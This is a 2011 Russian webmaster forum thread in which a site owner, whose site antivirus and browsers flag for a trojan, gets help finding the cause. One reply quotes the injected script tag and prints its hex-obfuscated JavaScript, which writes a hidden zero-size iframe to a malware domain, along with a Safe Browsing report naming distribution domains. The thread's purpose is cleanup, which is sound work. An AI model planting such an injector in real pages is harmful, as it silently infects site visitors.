Перейти к содержимому


Пользователь месяца
Андрей WPMasterKZ Андрей WPMasterKZ 1-й за Ноябрь
Очков активности: 888 1 тема, 71 сообщение, 8 баллов репутации
Сайт: wpmaster.kz
ТОП самых активных за этот месяц
  • Фотография OlgaGetman
    #1

    OlgaGetman
    Очков активности: 666 5 тем, 96 сообщений, 4 балла репутации

  • Фотография Mandarin
    #2

    Mandarin
    Очков активности: 552 3 темы, 83 сообщения, 4 балла репутации

  • Фотография TimurR
    #3

    TimurR
    Очков активности: 150 Вне конкурса за определение пользователя месяца

  • Фотография Андрей WPMasterKZ
    #4

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 117 Вне конкурса за определение пользователя месяца

  • Фотография BLIK
    #5

    BLIK
    Очков активности: 102 0 тем, 17 сообщений, 4 балла репутации

  • Фотография Rodiola
    #6

    Rodiola
    Очков активности: 45 1 тема, 12 сообщений, 2 балла репутации

  • Фотография WGN
    #7

    WGN (worldgamenews.com)
    Очков активности: 36 Вне конкурса за определение пользователя месяца

  • Фотография thisismyname
    #8

    thisismyname
    Очков активности: 27 4 темы, 6 сообщений, 1 балл репутации

  • Фотография pozitron123
    #9

    pozitron123
    Очков активности: 24 2 темы, 10 сообщений, 1 балл репутации

  • Фотография m3Re
    #10

    m3Re
    Очков активности: 22.5 2 темы, 9 сообщений, 1 балл репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 29.11.2018
  • Яндекс выдача: 11.12.2018
Топ 5 участников по репутации


  • Закрытая тема Тема закрыта

Помогити плизз! На сайте ТРОЯН!

#1 TiP-A-ToP

TiP-A-ToP
  • Неактивные
  • 119 сообщений
  • Репутация: 0
0

Отправлено 09 January 2011 - 01:21

;) Зашол на свой сайт от друга - у нево лиценз. каспер, он высветил троян
аваст ничо не видит, что с ним делать???
P.S. чуть не забыл сказать, сайт - astoria-kas.com

 

 

  • 0

#2 starinushka

starinushka
  • Неактивные
  • 25 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 10:54

Насколько я слышал, нужно открывать каждый файл и искать там чужеродный код... Я зашел, у меня аваст тоже ничего не видит.

Может быть каспер по обыкновению путает какой-нибудь нормальный скрипт с вирусом?
  • 0

#3 Banderas

Banderas
  • Неактивные
  • 1168 сообщений
  • Репутация: 1

Отправлено 09 January 2011 - 11:15

Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
Веб-сайт astoria-kas.com содержит элементы с сайта astoria-kas.at.ua, на котором, судя по всему, размещено вредоносное ПО – программы, которые могут нанести вред вашему компьютеру или выполнять действия без вашего согласия. Даже простое посещение сайта, на котором размещено вредоносное ПО, может привести к заражению вашего компьютера.
Более подробную информацию о неполадках с этими элементами можно найти на странице Google Страница диагностики безопасного просмотра для домена astoria-kas.at.ua.

Антивирус НОД32, но страницу блочит Хром. Думаю на странице просто код, который хочет получить доступ к личной информации пользователя, или роется в куках.
  • 0

I'm web-developer 

Magento one love!



#4 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 11:20

Возможно=) каспером не пользуюсь уже 3 года. Только проблема в том што мне нужно зарегистрироваться в одном каталоге, и в его адима каспер тож светит троян ;)

там чужеродный код...

Может кто подскажет етот код?
  • 0

#5 bumer

bumer
  • Пользователь
  • 502 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 11:23

касперский нашел какой то jar фаил, может попробовать его найти на фтп
  • 0

#6 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 11:30

Антивирус НОД32, но страницу блочит Хром. Думаю на странице просто код, который хочет получить доступ к личной информации пользователя, или роется в куках.

Мне тоже хром ето светит но там иногда и другие сайты (вместо astoria-kas.at.ua)
Дело в том што сайт раньше был на юкозе, я просто купил домен и переместил сайт

Только *JAR файл? а троян?
  • 0

#7 admin

admin
  • Пользователь PRO
  • 5275 сообщений
  • Репутация: 55

Отправлено 09 January 2011 - 11:31

Сайт может угрожать безопасности вашего компьютера © Яндекс.
И рекомендации того же Яндекса: http://help.yandex.r...ter/?id=1059440
Как устраните подозрительный код, пишите в саппор, должны снять эту пометку.

P.S. Учите русский язык, или проверяйте свои сообщения в ворде перед публикацией, читать невозможно.
  • 0

#8 Banderas

Banderas
  • Неактивные
  • 1168 сообщений
  • Репутация: 1

Отправлено 09 January 2011 - 11:34

Мне тоже хром ето светит но там иногда и другие сайты (вместо astoria-kas.at.ua)
Дело в том што сайт раньше был на юкозе, я просто купил домен и переместил сайт

Только *JAR файл? а троян?

в файле с расширением .jar может содержатся вирус, а может и быть самим трояном
  • 0

I'm web-developer 

Magento one love!



#9 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 12:21

ОНО???
Изображение
  • 0

#10 Banderas

Banderas
  • Неактивные
  • 1168 сообщений
  • Репутация: 1

Отправлено 09 January 2011 - 12:39

ОНО???

Попробуйте отключить и тогда узнаете - самый простой способ ;)
  • 0

I'm web-developer 

Magento one love!



#11 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 12:42

а какой примерно код должен быть?
  • 0

#12 Banderas

Banderas
  • Неактивные
  • 1168 сообщений
  • Репутация: 1

Отправлено 09 January 2011 - 16:33

а какой примерно код должен быть?

скопируйте html код главной страницы, тот что между тегами <head></head> и вставьте сюда (на нашем форуме для этого есть специальные bbcode теги).

Пытался сам зайти на сайт, но меня раз 6-7 отговаривал Хром, но потом меня выбросило на порно партнерку. Больше не рисковал...
  • 0

I'm web-developer 

Magento one love!



#13 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 17:15

 <meta name='yandex-verification' content='6e7380f66e54d212' /> 
<link rel="icon" href="www.google.com/ig/c/favicons?domain=wwe.su" type="image/x-icon">
<link rel="shortcut icon" href="www.google.com/ig/c/favicons?domain=wwe.su" type="image/x-icon">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="google-site-verification" content="qALhB2u17m3SbAuo7UdE4lrQVGkkGcyEgdRZEqc4MQs" />
<style type="text/css"> body { cursor: url('http://astoria-kas.at.ua/ovchark3.cur'); } </style>
<title>Питомник Astoria Kas - Главная страница</title>

<link type="text/css" rel="StyleSheet" href="/.s/src/css/841.css" />
<link type="text/css" rel="StyleSheet" href="http://s44.ucoz.net/src/layer6.css" /><script type="text/javascript" src="http://s44.ucoz.net/src/u.js"></script><style type="text/css">.UhideBlockL {display:none}</style>

  • 0

#14 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 January 2011 - 17:31

отруби все партнерки, посмотри на результат, потом по очереди подключи и найдешь
  • 0

#15 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 17:34

убрал, но как проверить сработало ли оно?
  • 0

#16 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 January 2011 - 17:52

у меня все равно FF ругается:

Безопасный просмотр
Страница диагностики для astoria-kas.com

Занесен ли сайт astoria-kas.com в список подозрительных веб-сайтов?

Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта несколько раз (1) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?

Из протестированных нами за последние 90 дней страниц данного сайта (2) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 1. Последний раз сайт просматривался Google 2011-01-09, а подозрительное содержание было обнаружено 2011-01-09.

Malicious software includes 1 scripting exploit(s).

Количество доменов, на которых размещается вредоносное ПО, равняется 3, включая pro-zp.narod.ru/, razor.ipq.co/, tnafix.ru/.

Несколько доменов (5), по всей видимости, является промежуточными звеньями в распространении вредоносного ПО среди посетителей этого сайта, включая wifikflc.info/, pro-zp.narod.ru/, assassin-vse.narod.ru/.

This site was hosted on 1 network(s) including AS41947 (WEBALTA).

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт astoria-kas.com не был промежуточным звеном в заражении других сайтов.

Размещается ли на этом сайте вредоносное программное обеспечение?

Нет. За последние 90 дней на этом сайте не размещалось вредоносное программное обеспечение.

Как это произошло?

В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.

Следующие действия:

* Вернуться на предыдущую страницу.


http://safebrowsing....p;site=AS:41947


слушай я не знаю, что за хостинг у тебя, но по идее у нормального хоста должен быть антивирус, прогони им

а какой браузер используешь?
  • 0

#17 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 18:18

Хостинг Украина ukraine.com.ua
антивируску не нашёл=(
домен покупаю первый раз=) опыта не имею

опера11
  • 0

#18 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 January 2011 - 18:32

поставь http://www.mozilla.com/ru/firefox/
в опере не блокируется, но активность есть

напиши хостеру, спроси про антивирус и спроси про проблему

там есть cpanel?
  • 0

#19 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Неактивные
  • 119 сообщений
  • Репутация: 0

Отправлено 09 January 2011 - 18:35

что, и где cpanel
  • 0

#20 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 January 2011 - 18:45

у тебя внедрен следующий код

<script type="text/javascript" src="http://pro-zp.narod.ru/base.js"></script>


я думаю он является источником бед, попробуй убить его и посмотри, т.к. такой сайт pro-zp.narod.ru не создан, а сам скрипт так же блокируется
думаю это троян, вот его содержимое:

var _0xd1d5=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x61\x73\x73\x61\x73\x73\x69\x6E\x2D\x76\x73\x65\x2E\x6E\x61\x72\x6F\x64\x2E\x72\x75\x2F\x27\x20\x77\x69\x64\x74\x68\x3D\x27\x30\x25\x27\x20\x68\x65\x69\x67\x68\x74\x3D\x27\x30\x25\x27\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x27\x6E\x6F\x27\x20\x66\x72\x61\x6D\x65\x42\x6F\x72\x64\x65\x72\x3D\x30\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];document[_0xd1d5[1]](_0xd1d5[0]);

а вот ссылка где о нем говорят http://forum.xakep.r...3/printable.htm

он находиться тут:
<!-- <block4> -->
<table border="0" cellpadding="0" cellspacing="0" bgcolor="#033FF" " width="191">
<tr><td height="40" style="background:url('http://astoria-kas.at.ua/q1q1.gif') #336699;color:#b22222;padding-right:10px;" align="right"><b><!-- <bt> -->Пользователь<!-- </bt> --></b></td></tr>
<tr><td top no-repeat;"><!-- <bc> -->
<br>
<div align="center"<img src="/.s/t/982/7.gif"
<br>Гость, мы рады вас видеть. Пожалуйста зарегистрируйтесь или авторизуйтесь!
</div><script type="text/javascript" src="http://pro-zp.narod.ru/base.js"></script>

</div><!-- </bc> --></td></tr>
<tr><td><img src="http://astoria-kas.at.ua/x.png" border="0"></td></tr>
</table><br />
<!-- </block4> -->


и на будущее обычно их подгружают не между тегами head как некоторые советуют, наверное от не знания, а между тегами body!!!
  • 0

robot

robot
  • Пользователь PRO
  • 2652 сообщений
  • Репутация: 85

Оформление форума – IPBSkins.ru